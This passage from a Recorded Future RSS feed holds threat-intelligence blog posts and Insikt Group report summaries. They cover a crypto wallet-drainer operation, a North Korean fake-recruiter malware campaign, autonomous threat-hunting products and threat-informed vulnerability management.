        <p>The gap between what most security programs need and what traditional threat intelligence provides continues to widen. Adversaries operate at scale, evolving infrastructure faster than feeds can update. Internal telemetry shows only what touches your perimeter. Point-in-time observations lack the context to distinguish targeted attacks from noise.</p>
        <p>Network intelligence addresses this gap with the ability to query global visibility using your own selectors. At Recorded Future, we've developed capabilities that operate at this scale, with the compliance framework and operational expertise to make them effective. For organizations ready to move beyond pre-packaged feeds, we're offering these capabilities to select customers through an invitation-only program.</p>
        <p>What matters now is recognizing that your questions matter more than their answers and building security programs that reflect that reality.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_188ef07891988f2f97aad055a1f5a7c089fb55765.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[State of Security Report | Recorded Future]]></title>
            <link>https://www.recordedfuture.com/ko/research/state-of-security</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/state-of-security</guid>
            <pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Download Recorded Future's 2026 State of Security report which provides comprehensive threat intelligence on geopolitical fragmentation, state-sponsored operations, ransomware evolution, and emerging technology risk.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Fragmentation is the new normal</h2>
              <p>The global threat landscape didn't simplify in 2025—it shattered. Geopolitical alliances strained. Criminal enterprises splintered and regrouped. State-sponsored actors shifted from dramatic disruptions to quiet pre-positioning. And as long-established norms unwound, convergence across once-distinct domains created unprecedented uncertainty.</p>
              <p>The 2026 State of Security report delivers Insikt Group's most comprehensive annual analysis of the forces shaping global security—helping leaders reduce surprise, prioritize effectively, and act with confidence.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_188a8fbb5001e358d9837adb14d5fb0897434527c.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Fragmentation Defined 2025's Threat Landscape. Here's What It Means for 2026]]></title>
            <link>https://www.recordedfuture.com/ko/blog/fragmentation-in-2025-what-it-means-for-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/fragmentation-in-2025-what-it-means-for-2026</guid>
            <pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[The global threat landscape didn't simplify in 2025 — it shattered. The 2026 State of Security report represents Insikt Group's most comprehensive threat intelligence analysis to date, drawing on proprietary intelligence, network telemetry, and deep geopolitical research to help you stay ahead of converging threats.]]></description>
            <content:encoded><![CDATA[
        <p>Uncertainty has become the operating environment for business. And this year, fragmentation is driving it.</p>
        <p>The global threat landscape didn't simplify in 2025; it shattered. Geopolitical alliances strained. Criminal enterprises splintered under law enforcement pressure, then regrouped into smaller, faster, and harder-to-track operations. State-sponsored cyber actors shifted from dramatic disruptions to quiet pre-positioning, embedding themselves in networks and waiting. Hacktivist groups and influence networks amplified conflicts, blurring the line between genuine intrusions and perception warfare.</p>
        <p>But here's what makes this moment dangerous: as long-established norms unwind, fragmentation is paradoxically enabling greater interoperability across domains that were once distinct. State objectives, criminal capability, and private-sector technology increasingly reinforce one another. That convergence creates uncertainty, compresses warning time, and expands plausible deniability.</p>
        <p>Today, Recorded Future's Insikt Group releases the <strong><a href="https://www.recordedfuture.com/ko/research/state-of-security">2026 State of Security</a></strong> report, our most comprehensive annual analysis of the forces shaping global security.</p>
        <p>Drawing on proprietary intelligence, network telemetry, and deep geopolitical analysis, this report examines how 2025's fractures are reshaping the threat environment — and what security leaders must prepare for in the year ahead.</p>
        <h2>The End of Stability as a Baseline Assumption</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_10c922a3a2103e396f22a400e3135d81ce6b0f02b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1220" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>2025 redefined international relations (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_14120f6481cb46917d75b8ece722dda331953c861.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[From 27 Steps to 5: How Recorded Future Reimagined Threat Hunting with Autonomous Threat Operations]]></title>
            <link>https://www.recordedfuture.com/ko/blog/threat-hunting-27-steps-to-5</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/threat-hunting-27-steps-to-5</guid>
            <pubDate>Wed, 11 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how Autonomous Threat Operations reduces 27 manual steps to as few as 5 largely automated ones, delivering the speed, scale, and effectiveness that the modern threat landscape demands.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>The manual operations gap can be a business risk</li>
                <li>Manual threat hunting requires 27 steps that burn analyst time</li>
                <li>Autonomous Threat Operations can reduce 27 steps to 5</li>
                <li>Autonomous operations prove measurable ROI</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1d6aff1dc009c244e9b6f66a1f1fe7bd44e4b681f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Rublevka Team: Anatomy of a Russian Crypto Drainer Operation]]></title>
            <link>https://www.recordedfuture.com/ko/research/rublevka-team-anatomy-russian-crypto-drainer-operation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/rublevka-team-anatomy-russian-crypto-drainer-operation</guid>
            <pubDate>Wed, 04 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Rublevka Team exemplifies the industrialization of crypto scams. Learn how traffer teams and wallet drainers enable high-volume theft.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group has identified a major cybercriminal operation specializing in large-scale cryptocurrency theft, operating under the moniker “Rublevka Team”. Since its inception in 2023, the threat group has generated over $10 million through affiliate-driven wallet draining campaigns. Rublevka Team is an example of a “traffer team,” composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages. Unlike traditional malware-based approaches such as those used by the traffer teams Marko Polo and CrazyEvil (previously identified by Insikt Group, both of which distributed infostealer malware), Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions. Their infrastructure is fully automated and scalable, offering affiliates access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. By lowering the technical barrier to entry, Rublevka Team has built an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight.</p>
        <p>This structure poses a growing threat to cryptocurrency platforms, fintech providers, and brands whose identities are being impersonated. Organizations that facilitate blockchain transactions, particularly fintech firms, exchanges, or wallet providers, face elevated reputational and legal risks if customers fall victim to these scams. Even if the victim’s compromise occurs outside a firm’s platform, failure to detect spoofed landing pages or fraudulent referrals can trigger consumer backlash, loss of trust, or regulatory scrutiny around customer protections and Know Your Customer (KYC) enforcement. The threat group’s agility — evidenced by its use of frequently rotating domains, targeting lower-cost chains like Solana (SOL), and exploiting Remote Procedure Call (RPC) APIs — undermines traditional fraud detection and domain takedown efforts. Their model mirrors ransomware-as-a-service (RaaS) operations, signaling a continuation of the broader shift toward scalable, service-based cybercrime that organizations must proactively monitor, disrupt, and defend against to protect customers and maintain trust.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>The objective of a Rublevka Team scam is to create an attractive SOL-based offer, such as a promotion or an airdrop event, generate traffic to the lure via social media or advertisements, and trick a user into connecting their wallet to the website and signing a transaction that drains their wallet.</li>
          <li>As of writing, Rublevka Team’s primary Telegram channel has approximately 7,000 members. Over 240,000 messages have been posted to Rublevka Team’s automated “profits” channel, indicating at least 240,000 successful wallet drains, with transactions ranging from $0.16 to over $20,000.</li>
          <li>Rublevka Team offers a custom JavaScript drainer embedded into their landing pages, which exfiltrates victims’ SOL assets by draining held tokens. The drainer is compatible with over 90 SOL wallet types.</li>
          <li>The threat group’s infrastructure is fully automated via Telegram bots, offering affiliates tools for landing page creation, campaign tracking, cloaking, and distributed denial-of-service (DDoS) protection.</li>
          <li>The drainer campaign, active since 2023, leverages spoofed versions of legitimate services such as Phantom, Bitget, and Jito to maximize user trust and conversion.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1f21796732ee17098dc9eae5148e093dc47d7f9de.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team | Recorded Future]]></title>
            <link>https://www.recordedfuture.com/ko/blog/autonomous-threat-operations-in-action</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/autonomous-threat-operations-in-action</guid>
            <pubDate>Sun, 01 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article explores how Recorded Future served as Customer Zero for Autonomous Threat Operations, testing the new solution within our own SOC to validate its real-world impact before releasing it to the public. The article reveals how the technology transformed inconsistent, analyst-dependent threat hunting into unified, automated operations—enabling junior analysts to run 15–20 hunts weekly and allowing our CISO to launch comprehensive network hunts in five minutes in response to critical threats like Salt Typhoon. By understanding these outcomes, security leaders can see how autonomous threat hunting empowers teams at every skill level to shift from reactive to proactive defense.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways:</h2>
        <ul>
          <li>Recorded Future deployed Autonomous Threat Operations within its own SOC before customer release, ensuring real-world effectiveness and identifying critical capabilities.</li>
          <li>Autonomous Threat Operations reduced analyst-dependent, inconsistent processes, creating standardized hunts that deliver the same input, output, and expectations every time.</li>
          <li>Team members now run 15–20 threat hunts weekly—work that previously required days or weeks of manual research, coordination, and planning.</li>
          <li>During the Salt Typhoon campaign, Recorded Future's CISO launched a comprehensive network-wide threat hunt in five minutes between meetings, enabling immediate risk mitigation.</li>
          <li>A single pane of glass eliminates context-switching across multiple tools, allowing analysts to hunt threats and research IOCs within one platform.</li>
        </ul>
        <h2>Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team</h2>
        <p>The ultimate test of any cybersecurity solution Recorded Future builds? Using it to defend our own network.</p>
        <p>That's exactly what we did with Autonomous Threat Operations. Before rolling it out to customers, we became Customer Zero, deploying the technology within our security operations organization to see if it could truly transform the way security teams hunt for threats.</p>
        <p>The results exceeded our expectations. What we discovered wasn't just incremental improvement; it was a fundamental shift in what our security team could accomplish.</p>
        <h2><strong>The challenge: Inconsistent and analyst-dependent threat hunting</strong></h2>
        <p>Prior to implementing Autonomous Threat Operations, we faced the same threat hunting challenges many security teams struggle with today. As Josh Gallion, Recorded Future's Incident Response Manager, explains: "Before using Autonomous Threat Operations, our approach to threat hunting was more piecemeal and unique to each analyst. It varied based on whatever they were comfortable with and however they were trained on the tooling."</p>
        <p>This inconsistency meant that the quality and thoroughness of our threat hunts varied significantly by analyst. And since each team member had different strengths, different levels of experience, and different comfort levels with our security tools, we struggled to standardize the process.</p>
        <h2><strong>The transformation: Unified, repeatable threat hunting</strong></h2>
        <p>Autonomous Threat Operations leveled the playing field immediately. "It unifies the hunting capability and makes it so that every time analysts run a hunt, it's the same," says Gallion. "We get the same input, we get the same output, and we know what to expect."</p>
        <p>The implementation was remarkably straightforward. "When we turned it on, it just was a simple connection to our Splunk environment," he says. "And once the team started using it, we could see an increase in the number of threat hunts each user would do."</p>
        <p>Perhaps most importantly, Autonomous Threat Operations enabled our team to shift from reactive, manual hunting to proactive, automated operations. "Now we can schedule hunts that will continuously run over time, update with the threat actor TTPs, and give us a more holistic view," Gallion says. "Before, we had to have an analyst get back into the product and look for new IOCs to run. Now it just runs it automatically and we know that that's taken care of."</p>
        <h2><strong>Real-world impact: Upskilling junior analysts and enabling rapid response</strong></h2>
        <p>According to Recorded Future's CISO, Jason Steer, the true value of Autonomous Threat Operations became clear through two significant outcomes.</p>
        <p>First, the technology dramatically upskilled our junior staff. In traditional manual workflows, preparing to run a single threat hunt could take days or even weeks—requiring extensive research, coordination, and planning.</p>
        <p>Today, our junior analysts are running 15–20 threat hunts each week to identify high-priority threats. This isn't just about quantity; it's about empowering less experienced team members to contribute meaningfully to our defense posture while accelerating their professional development.</p>
        <p>Gallion sees this impact firsthand. "We have newer analysts who can do more advanced hunting based on IOCs, and it does it for them automatically in the background," he says. "We get our results, and then they can do research in the app to shore up the findings."</p>
        <p>Second, the speed and accessibility of automated threat hunting has proven invaluable during critical moments. When Steer read about Salt Typhoon making its way into corporate networks, he didn't need to schedule a meeting, assemble a team, or wait for the next sprint cycle. In the five minutes between meetings, he was able to launch a comprehensive threat hunt across Recorded Future's entire network to identify and mitigate associated risks to our systems.</p>
        <p>That kind of rapid response would have been impossible with manual processes—and in today's threat landscape, that speed can mean the difference between containment and catastrophe.</p>
        <h2><strong>The advantage of a single pane of glass</strong></h2>
        <p>Another key benefit emerged around workflow efficiency. "Having a single pane of glass makes it a lot easier for an analyst to do not just the threat hunt, but also to see the meaning behind the IOCs that they're pulling back into the app," says Gallion. "Analysts don't like to have to get into a whole bunch of different applications. If we don't have to, it speeds things up and we can add context from inside the app."</p>
        <p>This unified approach has eliminated the context-switching and tool-juggling that had often slowed down our security team and led to missed findings.</p>
        <h2><strong>Why the Customer Zero experience matters</strong></h2>
        <p>Serving as Customer Zero validated what we believed Autonomous Threat Operations could deliver to every customer: consistent, repeatable threat hunting that empowers analysts of all skill levels to defend their organizations more effectively. By testing the new solution within our own security operations first, we were able to identify what works, refine the capabilities that matter most, and prove that Autonomous Threat Operations isn't just a theoretical improvement—it's a practical solution that transforms daily security operations.</p>
        <p>Gallion sums it up this way: "Some of the aspects of Autonomous Threat Operations that'll have the biggest impact are the repeatability, the scheduling of threat hunts to happen over time, and the single pane of glass that allows analysts to research IOCs in the app without having to go into multiple tools."</p>
        <p>We saw a need for Autonomous Threat Operations, so we built it. Being Customer Zero enabled us to test it, refine it, and ensure that it’s the best possible solution to help our customers enter the era of the autonomous SOC.</p>
        <p><strong>Learn more about Autonomous Threat Operations by clicking</strong> <strong><a href="https://www.recordedfuture.com/ko/products/autonomous-threat-operations">here</a>, or start operationalizing your threat intelligence now by booking a</strong> <strong><a href="https://go.recordedfuture.com/ato-demo.html?__utma=150831654.1091255729.1769524153.1769524153.1769524153.1&amp;__utmb=150831654.0.10.1769524153&amp;__utmc=150831654&amp;__utmx=-&amp;__utmz=150831654.1769524153.1.1.utmcsr=(direct)%7Cutmccn=(direct)%7Cutmcmd=(none)&amp;__utmv=-&amp;__utmk=14649591">custom demo</a>.</strong></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1a3ded09023847b846727759f0086351655ddf92a.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[PurpleBravo’s Targeting of the IT Software Supply Chain]]></title>
            <link>https://www.recordedfuture.com/ko/research/purplebravos-targeting-it-software-supply-chain</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/purplebravos-targeting-it-software-supply-chain</guid>
            <pubDate>Wed, 21 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how PurpleBravo, a North Korean threat group, exploits fake job offers to target software supply chains, using RATs and infostealers like BeaverTail.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>PurpleBravo is a North Korean state-sponsored threat group that overlaps with the “Contagious Interview” campaign first documented in November 2023. It targets software developers, especially in the software development and cryptocurrency verticals, via fake recruiter outreach, interview coding tests, and ClickFix prompts. Activity throughout 2025 has linked multiple fraudulent LinkedIn personas to PurpleBravo through malicious GitHub repositories and fictitious lure brands. The group’s tool set includes BeaverTail (a JavaScript infostealer and loader) and multi-platform remote access trojans (RATs), specifically, PyLangGhost and GolangGhost, optimized for stealing browser credentials and cryptocurrency wallet information.</p>
        <p>Based on Recorded Future® Network Intelligence, Insikt Group identified 3,136 individual IP addresses concentrated in South Asia and North America linked to likely targets of PurpleBravo activity from August 2024 to September 2025. Twenty potential victim organizations were observed across the AI, cryptocurrency, financial services, IT services, marketing, and software development verticals in Europe, South Asia, the Middle East, and Central America. In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target. Insikt Group observed PurpleBravo administering command-and-control (C2) servers via Astrill VPN and from IP ranges in China, with BeaverTail and GolangGhost C2 servers hosted across seventeen distinct providers.</p>
        <p>Insikt Group distinguishes PurpleBravo (Contagious Interview) from PurpleDelta (North Korean IT workers) but has documented meaningful intersections. This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity.</p>
        <p>PurpleBravo presents an overlooked threat to the IT software supply chain. Because many targets are in the IT services and staff-augmentation industries with large public customer bases, compromises can propagate downstream to their customers. This campaign poses an acute software supply-chain risk to organizations that outsource development, particularly in regions where PurpleBravo concentrates its fictitious recruitment efforts.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>PurpleBravo employs a combination of fictitious personas, organizations, and websites to distribute malware to unsuspecting job seekers in the software development industry. Candidates sometimes use their corporate devices, thereby compromising their employers' security.</li>
          <li>PurpleBravo uses a variety of custom and open-source malware and tools in its operations, including BeaverTail, InvisibleFerret, GolangGhost, and PyLangGhost.</li>
          <li>Using Recorded Future Network Intelligence, Insikt Group identified 3,136 individual IP addresses linked to likely targets of PurpleBravo activity and twenty potential victim organizations in the AI, cryptocurrency, financial services, IT services, marketing, and software development industries.</li>
          <li>Insikt Group has observed multiple points of overlap between PurpleBravo and PurpleDelta, Recorded Future’s designation for North Korean IT workers, indicating that some individuals may be active in both operations.</li>
          <li>PurpleBravo’s heavy targeting of the IT and software development industries in South Asia presents an overlooked and acute supply-chain risk to organizations that contract or outsource their IT services work.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1bf59fb2748dede14af5b52ad8cb001808918b07e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Threat and Vulnerability Management in 2026]]></title>
            <link>https://www.recordedfuture.com/ko/blog/threat-and-vulnerability-management</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/threat-and-vulnerability-management</guid>
            <pubDate>Fri, 16 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Understand the future of threat and vulnerability management (TVM). Learn what TVM is, why traditional tools fail, and how intelligence is essential in today’s landscape.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways:</h2>
        <ul>
          <li><strong>Traditional vulnerability management tools can no longer keep up</strong> with the speed of modern exploitation—threat context is now mandatory.</li>
          <li><strong>Threat and Vulnerability Management (TVM) systems</strong> unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.</li>
          <li><strong>Static CVSS scores fail to reflect exploitation likelihood</strong>; intelligence-driven, dynamic risk scoring is essential in 2026.</li>
          <li><strong>Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste</strong>, enhancing detection and remediation while reducing alert fatigue.</li>
        </ul>
        <h2>Why Threat and Vulnerability Management Must Evolve in 2026</h2>
        <p>Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge higher and higher. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.</p>
        <p>Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.</p>
        <p>Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert fatigue.</p>
        <p>In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using <a href="https://www.recordedfuture.com/ko/threat-intelligence">intelligence-driven TVM systems</a>.</p>
        <h2>The Core Problem: Alert Fatigue and Prioritization Failure</h2>
        <p>As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.</p>
        <p>Traditionally, using a standard CVSS (Common Vulnerability Scoring System) was enough to overcome these <a href="https://www.recordedfuture.com/ko/blog/addressing-the-vulnerability-prioritization-challenge">challenges of prioritization</a>. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.</p>
        <p>However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:</p>
        <ul>
          <li>Is exploit code available?</li>
          <li>Is the vulnerability actively exploited?</li>
          <li>Are threat actors discussing or operationalizing it?</li>
        </ul>
        <p>As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.</p>
        <p>At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.</p>
        <p>Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without this, many adopt a de facto policy of “patch everything”. And it comes with significant costs, including:</p>
        <ul>
          <li>Operational drag and burnout</li>
          <li>Delayed remediation of truly dangerous vulnerabilities</li>
          <li>Increased business risk despite increased effort</li>
          <li>Fractured security operations</li>
        </ul>
        <p>Both individually and in the aggregate, these side effects come at a significant detriment to organizational security, and the cost grows as the number and diversity of CVEs continues to expand. Moving forward, organizations must find a better way.</p>
        <h2>The Evolving Threat Landscape Demands a New Approach</h2>
        <p>Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.</p>
        <p>Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.</p>
        <p>At the same time that weaponization is accelerating, attack surfaces are expanding. The average attack surface today is expanding and fragmenting across hybrid and multi-cloud environments, all of which is worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an <a href="https://www.recordedfuture.com/ko/blog/threat-intelligence-and-vulnerability-management">integrated approach</a> between the two.</p>
        <p>In short, a vulnerability is a technical weakness, while a threat is an actor, campaign, or event actively exploiting that weakness. In order to be truly effective, modern threat and vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.</p>
        <h2>What Is Threat and Vulnerability Management (TVM)?</h2>
        <p>Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:</p>
        <ul>
          <li>Active exploitation</li>
          <li>Threat actor behavior</li>
          <li>Asset criticality</li>
        </ul>
        <p>TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and closed-loop remediation and validation.</p>
        <p>This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.</p>
        <h2>The Five Core Pillars of Modern TVM Systems</h2>
        <p>As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where new vulnerabilities are exposed daily, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equal. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.</p>
        <p><strong>1. Continuous Asset Discovery &amp; Inventory</strong></p>
        <p>Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.</p>
        <p>Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.</p>
        <p><strong>2. Vulnerability Assessment &amp; Scoring</strong></p>
        <p>TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.</p>
        <p><strong>3. External Threat Context Enrichment</strong></p>
        <p>This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.</p>
        <p>Vulnerabilities are mapped to known threat actors, active exploitation, and <a href="https://attack.mitre.org/">MITRE ATT&amp;CK®</a> techniques, ultimately transforming raw findings into actionable intelligence.</p>
        <p><strong>4. Risk-Based Prioritization (RBVM)</strong></p>
        <p>Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.</p>
        <p><strong>5. Automated Remediation &amp; Verification</strong></p>
        <p>Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.</p>
        <p>These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burn-out and alert fatigue.</p>
        <h2>Stop Patching Everything — Use Intelligence to Prioritize Real Risk</h2>
        <p>The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.</p>
        <p>Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.</p>
        <p>Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.</p>
        <p>The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.</p>
        <h2>See Your Risk Like an Attacker: The Full Attack Surface View</h2>
        <p>In today’s threat landscape, security teams must rethink their roles. Rather than operating reactively and defensively at all times, they should think more like their adversaries: take a complete view of the attack surface and use modern tools and technologies to build intelligent, prioritized defenses. The following three key concepts will help you adopt that mindset.</p>
        <ol>
          <li><strong>The Visibility Gap:</strong> Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.</li>
          <li><strong>Attack Surface Intelligence Explained:</strong> Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.</li>
          <li><strong>Connecting the Dots with Vulnerability Tools:</strong> When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.</li>
        </ol>
        <h2>Three Strategic Recommendations for Security Leaders</h2>
        <p>Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.</p>
        <p><strong>1. Bridge the Gap Between Security and IT</strong></p>
        <p>Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.</p>
        <p><strong>2. Embrace Automation and Workflow Integration</strong></p>
        <p>Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.</p>
        <p><strong>3. Measure What Matters — Time-to-Remediate (TTR)</strong></p>
        <p>Shift KPIs toward time-to-remediate for actively exploited vulnerabilities and toward reduction in exposure windows. These metrics demonstrate real ROI and security impact.</p>
        <h2>The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy</h2>
        <p>Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.</p>
